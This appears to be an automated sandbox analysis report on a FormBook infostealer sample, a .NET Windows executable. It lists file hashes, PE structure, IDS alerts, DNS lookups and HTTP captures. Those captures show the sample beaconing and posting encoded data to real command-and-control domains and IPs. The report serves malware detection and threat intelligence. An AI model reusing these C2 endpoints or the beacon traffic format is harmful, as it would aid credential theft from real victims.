                                                SHA512:3095b0367986da7cef70812837bfe82ee376ff594083e9b896e0431224e95173df786e3c72604d8a26b6777d658644fa818165fb9fbbd1f4430b39e7fb187976
                                                SSDEEP:12288:2GWnuyc6HBpwnItiIt45s4SlkMVwfqosFqsvR3Cj6zlgQ:bSdnwnIVWs4ekEwyo+86RgQ
                                                TLSH:8EB4F118F748B14DC3154AF2569E4DCA11167EA8FACF1606A2C0BFC9B9F6C981133E97
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[Y=g................................. ... ....@.. ....................... ............@................................
                                                Icon Hash:479b332b0b2b3709
                                                Entrypoint:0x46072e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x673D595B [Wed Nov 20 03:36:59 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x606d4 | 0x57 | .text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x1c09c | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x62000 | 0xc | .reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x2000 | 0x5e734 | 0x5e800 | 597a53394193032b51e5efc06c2dbe04 | False | 0.9893017319775133 | data | 7.99304503862032 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .reloc | 0x62000 | 0xc | 0x200 | c704aa5c935649934d86d3964a362204 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x64000 | 0x1c09c | 0x1c200 | fed5a0f851793402bdad3a401179fc1a | False | 0.23622395833333334 | data | 4.22934906713951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                RT_ICON | 0x64220 | 0x345f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9850824196315358
                                                RT_ICON | 0x67680 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | | | 0.10429729090263812
                                                RT_ICON | 0x77ea8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m | | | 0.15717997165800662
                                                RT_ICON | 0x7c0d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | | | 0.1970954356846473
                                                RT_ICON | 0x7e678 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | | | 0.2523452157598499
                                                RT_ICON | 0x7f720 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | | | 0.44858156028368795
                                                RT_GROUP_ICON | 0x7fb88 | 0x5a | data | | | 0.7888888888888889
                                                RT_VERSION | 0x7fbe4 | 0x2cc | data | | | 0.42877094972067037
                                                RT_MANIFEST | 0x7feb0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                                                DLL | Import
                                                mscoree.dll | _CorExeMain
                                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                2024-11-20T07:16:10.362783+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49811 | 108.179.253.197 | 80 | TCP
                                                2024-11-20T07:16:10.362783+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49811 | 108.179.253.197 | 80 | TCP
                                                2024-11-20T07:16:25.981190+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49910 | 108.181.189.7 | 80 | TCP
                                                2024-11-20T07:16:28.502632+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49928 | 108.181.189.7 | 80 | TCP
                                                2024-11-20T07:16:31.393915+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49944 | 108.181.189.7 | 80 | TCP
                                                2024-11-20T07:16:33.637770+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49963 | 108.181.189.7 | 80 | TCP
                                                2024-11-20T07:16:33.637770+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49963 | 108.181.189.7 | 80 | TCP
                                                2024-11-20T07:16:39.358769+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49999 | 13.248.169.48 | 80 | TCP
                                                2024-11-20T07:16:41.914657+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50008 | 13.248.169.48 | 80 | TCP
                                                2024-11-20T07:16:44.486980+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50009 | 13.248.169.48 | 80 | TCP
                                                2024-11-20T07:16:47.040281+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50010 | 13.248.169.48 | 80 | TCP
                                                2024-11-20T07:16:47.040281+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50010 | 13.248.169.48 | 80 | TCP
                                                2024-11-20T07:17:02.315974+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50011 | 23.225.159.42 | 80 | TCP
                                                2024-11-20T07:17:04.831630+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50012 | 23.225.159.42 | 80 | TCP
                                                2024-11-20T07:17:07.409732+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50013 | 23.225.159.42 | 80 | TCP
                                                2024-11-20T07:17:10.487544+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50014 | 23.225.159.42 | 80 | TCP
                                                2024-11-20T07:17:10.487544+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 50014 | 23.225.159.42 | 80 | TCP
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 20, 2024 07:17:06.852379084 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852411032 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852440119 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852489948 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:06.852516890 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:07.349201918 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:07.409732103 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:07.424129009 CET805001323.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:07.428109884 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:08.362921000 CET5001380192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:09.383517027 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:09.388613939 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:09.388711929 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:09.407305002 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:09.412363052 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487343073 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487389088 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487421989 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487457991 CET805001423.225.159.42192.168.2.4
                                                Nov 20, 2024 07:17:10.487544060 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:10.487580061 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:10.681565046 CET5001480192.168.2.423.225.159.42
                                                Nov 20, 2024 07:17:10.686512947 CET805001423.225.159.42192.168.2.4
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 20, 2024 07:16:09.387995005 CET | 53754 | 53 | 192.168.2.4 | 1.1.1.1
                                                Nov 20, 2024 07:16:09.710263968 CET | 53 | 53754 | 1.1.1.1 | 192.168.2.4
                                                Nov 20, 2024 07:16:25.352030993 CET | 51783 | 53 | 192.168.2.4 | 1.1.1.1
                                                Nov 20, 2024 07:16:25.393264055 CET | 53 | 51783 | 1.1.1.1 | 192.168.2.4
                                                Nov 20, 2024 07:16:38.652740955 CET | 49879 | 53 | 192.168.2.4 | 1.1.1.1
                                                Nov 20, 2024 07:16:38.893996954 CET | 53 | 49879 | 1.1.1.1 | 192.168.2.4
                                                Nov 20, 2024 07:16:52.083024979 CET | 51417 | 53 | 192.168.2.4 | 1.1.1.1
                                                Nov 20, 2024 07:16:53.031152010 CET | 53 | 51417 | 1.1.1.1 | 192.168.2.4
                                                Nov 20, 2024 07:17:01.091922045 CET | 52413 | 53 | 192.168.2.4 | 1.1.1.1
                                                Nov 20, 2024 07:17:01.697036028 CET | 53 | 52413 | 1.1.1.1 | 192.168.2.4
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Nov 20, 2024 07:16:09.387995005 CET | 192.168.2.4 | 1.1.1.1 | 0x3af5 | Standard query (0) | www.bloodbalancecaps.shop | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:25.352030993 CET | 192.168.2.4 | 1.1.1.1 | 0x2388 | Standard query (0) | www.jalan2.online | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:38.652740955 CET | 192.168.2.4 | 1.1.1.1 | 0x6200 | Standard query (0) | www.avalanchefi.xyz | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:52.083024979 CET | 192.168.2.4 | 1.1.1.1 | 0xa23e | Standard query (0) | www.02760.wang | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:17:01.091922045 CET | 192.168.2.4 | 1.1.1.1 | 0x5495 | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Nov 20, 2024 07:16:09.710263968 CET | 1.1.1.1 | 192.168.2.4 | 0x3af5 | No error (0) | www.bloodbalancecaps.shop | bloodbalancecaps.shop | | CNAME (Canonical name) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:09.710263968 CET | 1.1.1.1 | 192.168.2.4 | 0x3af5 | No error (0) | bloodbalancecaps.shop | | 108.179.253.197 | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:25.393264055 CET | 1.1.1.1 | 192.168.2.4 | 0x2388 | No error (0) | www.jalan2.online | jalan2.online | | CNAME (Canonical name) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:25.393264055 CET | 1.1.1.1 | 192.168.2.4 | 0x2388 | No error (0) | jalan2.online | | 108.181.189.7 | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:38.893996954 CET | 1.1.1.1 | 192.168.2.4 | 0x6200 | No error (0) | www.avalanchefi.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:38.893996954 CET | 1.1.1.1 | 192.168.2.4 | 0x6200 | No error (0) | www.avalanchefi.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:16:53.031152010 CET | 1.1.1.1 | 192.168.2.4 | 0xa23e | Server failure (2) | www.02760.wang | none | none | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:17:01.697036028 CET | 1.1.1.1 | 192.168.2.4 | 0x5495 | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
                                                Nov 20, 2024 07:17:01.697036028 CET | 1.1.1.1 | 192.168.2.4 | 0x5495 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:17:01.697036028 CET | 1.1.1.1 | 192.168.2.4 | 0x5495 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:17:01.697036028 CET | 1.1.1.1 | 192.168.2.4 | 0x5495 | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
                                                Nov 20, 2024 07:17:01.697036028 CET | 1.1.1.1 | 192.168.2.4 | 0x5495 | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
                                                • www.bloodbalancecaps.shop
                                                • www.jalan2.online
                                                • www.avalanchefi.xyz
                                                • www.laohub10.net
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.4 | 49811 | 108.179.253.197 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:09.731165886 CET | 534 | OUT | GET /7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.bloodbalancecaps.shop
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Nov 20, 2024 07:16:10.316586971 CET | 550 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Wed, 20 Nov 2024 06:16:10 GMT
                                                Server: nginx/1.23.4
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW0
                                                X-Endurance-Cache-Level: 2
                                                X-nginx-cache: WordPress
                                                X-Server-Cache: true
                                                X-Proxy-Cache: MISS


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.4 | 49910 | 108.181.189.7 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:25.426307917 CET | 801 | OUT | POST /xu9o/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.jalan2.online
                                                Origin: http://www.jalan2.online
                                                Referer: http://www.jalan2.online/xu9o/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 203
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Ascii: Vblddl=V36Hnmii79e6ZaDI6TSblqfWsVrKT5twiY5Z09zrW6+QfTxNrrQuX9VcdEQ3LJwn86x5UVtLcUEBhaLjGnwlMr0iLUtCuJJfVlW3NtFgX1dtVGo0+qaHVBKkj8RocR1iSRUbhKiOp95VFp8ziIkrmIz46RR0SoHkVLRRKVAq0HXNt4Jrpu9asctuPNHhzw/gUg==
                                                Nov 20, 2024 07:16:25.980603933 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                content-type: text/html
                                                cache-control: private, no-cache, max-age=0
                                                pragma: no-cache
                                                date: Wed, 20 Nov 2024 06:16:25 GMT
                                                server: LiteSpeed
                                                content-encoding: gzip
                                                vary: Accept-Encoding
                                                transfer-encoding: chunked
                                                connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                2 | 192.168.2.4 | 49928 | 108.181.189.7 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:27.986664057 CET | 821 | OUT | POST /xu9o/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.jalan2.online
                                                Origin: http://www.jalan2.online
                                                Referer: http://www.jalan2.online/xu9o/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 223
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Ascii: Vblddl=V36Hnmii79e6LrzI41abwafVj1rKaZt8iY1Z0/D7WpWQRTBN6ZouQ9VcWkQyWZwu869HUQVLcUgBhf3jBUomPb0gSEtAz5JfVlW3Nu5GX1VtVXY0/LaETxKj1sRoYR1mSRVIhJmop/BVFoMzjZkktIy90xRhcLyxQpsSEDUOzETVleEx4fcN+cJdSKOV+zCpPsveLzdO18iKO081aCIo4YE=
                                                Nov 20, 2024 07:16:28.502454042 CET | 992 | IN | HTTP/1.1 404 Not Found
                                                content-type: text/html
                                                cache-control: private, no-cache, max-age=0
                                                pragma: no-cache
                                                date: Wed, 20 Nov 2024 06:16:28 GMT
                                                server: LiteSpeed
                                                content-encoding: gzip
                                                vary: Accept-Encoding
                                                transfer-encoding: chunked
                                                connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                3 | 192.168.2.4 | 49944 | 108.181.189.7 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:30.577260971 CET | 10903 | OUT | POST /xu9o/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.jalan2.online
                                                Origin: http://www.jalan2.online
                                                Referer: http://www.jalan2.online/xu9o/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 10303
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                4 | 192.168.2.4 | 49963 | 108.181.189.7 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:33.112720966 CET | 526 | OUT | GET /xu9o/?Vblddl=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&At=4ZW0 HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.jalan2.online
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Nov 20, 2024 07:16:33.637625933 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                content-type: text/html
                                                cache-control: private, no-cache, max-age=0
                                                pragma: no-cache
                                                content-length: 1249
                                                date: Wed, 20 Nov 2024 06:16:33 GMT
                                                server: LiteSpeed
                                                connection: close


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                5 | 192.168.2.4 | 49999 | 13.248.169.48 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:38.916897058 CET | 807 | OUT | POST /ctta/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.avalanchefi.xyz
                                                Origin: http://www.avalanchefi.xyz
                                                Referer: http://www.avalanchefi.xyz/ctta/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 203
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Ascii: Vblddl=21JNLLR6nWLwxwoFszlFoGmCfJ5h1sPV4R0pXIak1dM4UwcoHklbv0jsFz29p3RsrnZnaAYbN6rt1tg6ByeWFH6Sp1dUjryZ2jkAuVuPixhldjj66B83Zj58rlm6VC7DhEsIGd6HmAQ85zlvuaLg6ORVBOvHItXcvNVbSBp7O4eZLfJBw6ztwWVxAIjdUxzGlg==


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.4 | 50008 | 13.248.169.48 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:41.470963955 CET | 827 | OUT | POST /ctta/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.avalanchefi.xyz
                                                Origin: http://www.avalanchefi.xyz
                                                Referer: http://www.avalanchefi.xyz/ctta/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 223
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Ascii: Vblddl=21JNLLR6nWLw+zgFrQNFjGmBQp5hvcPR4RIpXJPv0vY4VRsoAhRbs0jsOT332nRrrnVVaBkbN6vt1u06AFCXHX6QyldatLyZ2jkAuVrHix5lBDT67g80Hz5/olm6RC7HhEs+GYipmFM853pvuLLvwORfPuuWPIvXpckNKnl8KZCAKZEbhLS6iWxCdPqpZyOP+qLVF8Lla1LcoSWBis762gw=


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.4 | 50009 | 13.248.169.48 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:44.018099070 CET | 10909 | OUT | POST /ctta/ HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.avalanchefi.xyz
                                                Origin: http://www.avalanchefi.xyz
                                                Referer: http://www.avalanchefi.xyz/ctta/
                                                Content-Type: application/x-www-form-urlencoded
                                                Connection: close
                                                Content-Length: 10303
                                                Cache-Control: max-age=0
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Data Ascii: Vblddl= [TRUNCATED]


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                8 | 192.168.2.4 | 50010 | 13.248.169.48 | 80 | 1068 | C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 20, 2024 07:16:46.553575993 CET | 528 | OUT | GET /ctta/?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4= HTTP/1.1
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-US,en;q=0.9
                                                Host: www.avalanchefi.xyz
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                Nov 20, 2024 07:16:47.040091991 CET | 390 | IN | HTTP/1.1 200 OK
                                                Server: openresty
                                                Date: Wed, 20 Nov 2024 06:16:46 GMT
                                                Content-Type: text/html
                                                Content-Length: 250
                                                Connection: close
                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4="}</script></head></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
